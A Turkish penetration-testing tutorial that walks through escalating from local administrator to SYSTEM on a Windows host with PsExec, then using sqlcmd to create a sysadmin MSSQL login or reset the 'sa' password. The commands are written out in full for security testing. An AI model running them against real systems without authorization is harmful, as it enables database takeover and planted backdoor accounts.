Yerel Yönetici Hakları ile Oturum Elde Edilen Bilgisayarda İşletim Sisteminde SYSTEM Yetkisi Elde Ederek MS SQL Veritabanına Erişim Sağlanması

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
278
views
Sızma testlerinde MSSQL yüklü bilgisayarda yerel yönetici hakkına sahip olduktan sonra, veritabanına direk olarak erişime sahip olunamayabilir. Bu yazıda, MSSQL sunucu bilgisayarda yerel yönetici iken, uygulamaya giriş yapabilmek için işletim sistemindeki SYSTEM hesabının kimliğine bürünülecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Mevcut durumda, yerel yönetici hakkı elde edilen bilgisayardaki MSSQL uygulamasında kimlik doğrulaması olarak Mixed Mod etkindir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-01

 

Ele geçirilen bilgisayarda, yerel yönetici haklarına sahip olunmuştur.

whoami
net user hacked

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-02_1

 

Ancak yerel yönetici hakları ile veritabanlarına erişim sağlanamamaktadır.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-03

 

Yerel yönetici haklarına sahip bir kullanıcı, Sysinternals Psexec aracını kullanarak SYSTEM haklarına erişim sağlayabilir.

whoami
PsExec.exe /s cmd
whoami

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-04

 

SYSTEM haklarına erişim sağlandıktan sonra, MSSQL üzerinde yeni bir kullanıcı oluşturulabilir ve bu hesap ile MSSQL üzerinde oturum açılabilir.

sqlcmd -S localhost
USE [master] GO
CREATE LOGIN [sa_hacked] WITH PASSWORD=N’Hh123456′
GO
EXEC master..sp_addsrvrolemember @loginame = N’sa_hacked’, @rolename = N’sysadmin’
GO

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-05

 

Not: Yeni kullanıcı oluşturmak yerine, (tavsiye edilmese de) mevcuttaki bir kullanıcının parolası da sıfırlanabilir.

ALTER LOGIN [sa] WITH PASSWORD=N’Ss123456′

 

Oluşturulan yeni kullanıcı hesabı ile MSSQL üzerinde oturum açılabilmiştir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-06

 

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

MSF mssql_enum_domain_accounts Auxiliary Modülü ile MS SQL Veritabanının Dahil Olduğu Etki Alanındaki Nesnelerin Elde Edilmesi

Invoke-SqlServer-Escalate-Dbowner Powershell Betiği ile Güvenilir Olarak Yapılandırılmamış Olan MS SQL Veritabanında TRUSTWORTHY Özelliğini Kötüye Kullanarak Hak Yükseltilmesi

sp_addsrvrolemember Stored Prosedürü ile Güvenilir Olarak Yapılandırılmamış Olan MS SQL Veritabanında TRUSTWORTHY Özelliğini Kötüye Kullanarak Hak Yükseltilmesi

MSF mssql_escalate_dbowner Auxiliary Modülü ile Güvenilir Olarak Yapılandırılmamış Olan MS SQL Veritabanında TRUSTWORTHY Özelliğini Kötüye Kullanarak Hak Yükseltilmesi

MSF mssql_enum Auxiliary Modülü ile MS SQL Veritabanına Ait Kritik Bilgilerin Elde Edilmesi

SQL Komutları ile MS SQL Veritabanındaki IMPERSONATE İzninin Kötüye Kullanılarak Hak Yükseltilmesi

MSF mssql_escalate_execute_as Auxiliary Modülü ile MS SQL Veritabanındaki IMPERSONATE İzninin Kötüye Kullanılarak Hak Yükseltilmesi

MSF mssql_enum_sql_logins Auxiliary Modülü ile MS SQL Veritabanındaki Kullanıcı Hesaplarının Elde Edilmesi

MSF mssql_hashdump Auxiliary Modülü ile MS SQL Veritabanındaki Kullanıcı Hesaplarının Parola Özetlerinin Elde Edilmesi

MSF mssql_sql_file Auxiliary Modülü ile MS SQL Veritabanında Betik Dosyaları Kullanılarak SQL Sorgularının Gerçekleştirilmesi

MSF mssql_sql Auxiliary Modülü ile MS SQL Veritabanında SQL Sorgularının Çalıştırılması

MS SQL Veritabanları Arasındaki Linkleri Kullanarak Link Kurulan Veritabanı Sunucusuna Meterpreter Bağlantısı Elde Edilmesi

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.